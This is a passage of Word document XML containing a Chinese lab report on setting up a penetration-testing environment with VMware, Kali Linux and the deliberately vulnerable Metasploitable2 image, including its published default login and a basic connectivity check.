          <w:lang w:val="en-US" w:eastAsia="zh-Hans" w:bidi="ar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-Hans" w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>虚拟机的搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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right="-512" w:rightChars="-244" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>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随着虚拟机技术的发展，可以很方便的在自己电脑中新建一个虚拟机，这个虚拟机可以安装Windows、OS X、Ubuntu 、 Centos、Kali等各种系统，而且可以设置虚拟机的内存、硬盘大小，虚拟机和真实的计算机完全一样，唯一不同的是在虚拟机中操作不会对宿主主机造成影响，你可以很方便的新建或者删除虚拟机</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90820" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="1778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rcRect r="120" b="9131"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5290820" cy="2590800"/>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黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Kali linux 系统的安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>VMware虚拟机软件安装完成后，第二步就是安装Kali Linux，我们首先在 官网 下载 Kali Linux 镜像 。</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下载地址：https://www.kali.org/downloads/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520" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="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31765" cy="3321685"/>
            <wp:effectExtent l="0" t="0" r="635" b="571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rcRect r="133" b="8469"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5231765" cy="3321685"/>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镜像下载完成后在VMware中新建一个虚拟机，按照以下步骤完成安装：</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1、新建虚拟机，选择“典型”</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356735" cy="3413760"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1524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rcRect r="186" b="6777"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4356735" cy="3413760"/>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2、选择安装程序光盘镜像，这里选择下载好的Kali linux。</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775835" cy="3705225"/>
            <wp:effectExtent l="0" t="0" r="24765" b="317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rcRect r="318" b="7820"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4775835" cy="3705225"/>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3、选择“其他 linux 3.x 内核64位安装”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pP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770120" cy="3747135"/>
            <wp:effectExtent l="0" t="0" r="5080"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1"/>
                    <a:srcRect r="437" b="6777"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4770120" cy="3747135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>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4、其他安装默认点击下一步就能完成 Kali Linux 的安装了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>安装后打开虚拟机，就能够正常进入系统使用</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24780" cy="3679825"/>
            <wp:effectExtent l="0" t="0" r="7620" b="317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2"/>
                    <a:srcRect r="267" b="6457"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5224780" cy="36798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黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans" w:bidi="ar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:eastAsia="zh-Hans" w:bidi="ar"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Metasploitable</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Metasploitable是一个系统镜像，已经在计算机中预置了大量安全漏洞，并且极易受到攻击，可以方便我们学习渗透测试技术。</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Metasploitable2是一个已预置的虚拟机，可以很方便的搭建实验环境，以下是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Metasploitable2的安装。</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1、下载镜像</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通过https://sourceforge.net/projects/metasploitable/ 下载Metasploitable2镜像，然后解压下载的文件。</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lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5238750" cy="1381125"/>
            <wp:effectExtent l="0" t="0" r="19050" b="1587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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5238750" cy="1381125"/>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2、双击打开 Metasploitable.vmx 文件。</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lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5231130" cy="1388110"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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4"/>
                    <a:srcRect r="145" b="14275"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5231130" cy="1388110"/>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3、这样就成功安装了Metasploitable2</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lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5242560" cy="2646045"/>
            <wp:effectExtent l="0" t="0" r="15240" b="2095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5"/>
                    <a:srcRect r="-73" b="9216"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5242560" cy="2646045"/>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4、登陆Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>默认的用户名和密码是：</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用户名： msfadmin</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密 码： msfadmin</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登陆成功后使用ifconfig查看网络配置</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lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4587240" cy="2303780"/>
            <wp:effectExtent l="0" t="0" r="10160" b="762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6"/>
                    <a:srcRect r="145" b="9869"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4587240" cy="2303780"/>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可以看到网络也已经连接成功了！</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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>渗透测试环境搭建成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里登陆 Kali Linux ，使用默认的浏览器 IceWeasel 访问 Metasploitable2 的虚拟机地址，可以看到已经成功的连接到Metasploitable。</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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5231130" cy="2684780"/>
            <wp:effectExtent l="0" t="0" r="1270" b="762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7"/>
                    <a:srcRect r="145" b="9368"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5231130" cy="2684780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>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320" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4、实验结果分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>这里登陆 Kali Linux ，使用默认的浏览器 IceWeasel 访问 Metasploitable2 的虚拟机地址，可以看到已经成功的连接到Metasploitable。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5236845" cy="2680970"/>
            <wp:effectExtent l="0" t="0" r="20955" b="1143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7"/>
                    <a:srcRect r="36" b="9496"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5236845" cy="268097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我们可以在虚拟机上搭建其它类型的操作系统，并尝试攻击，我们可以通过安装和开启防火墙或者入侵检测系统增加攻击的难度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
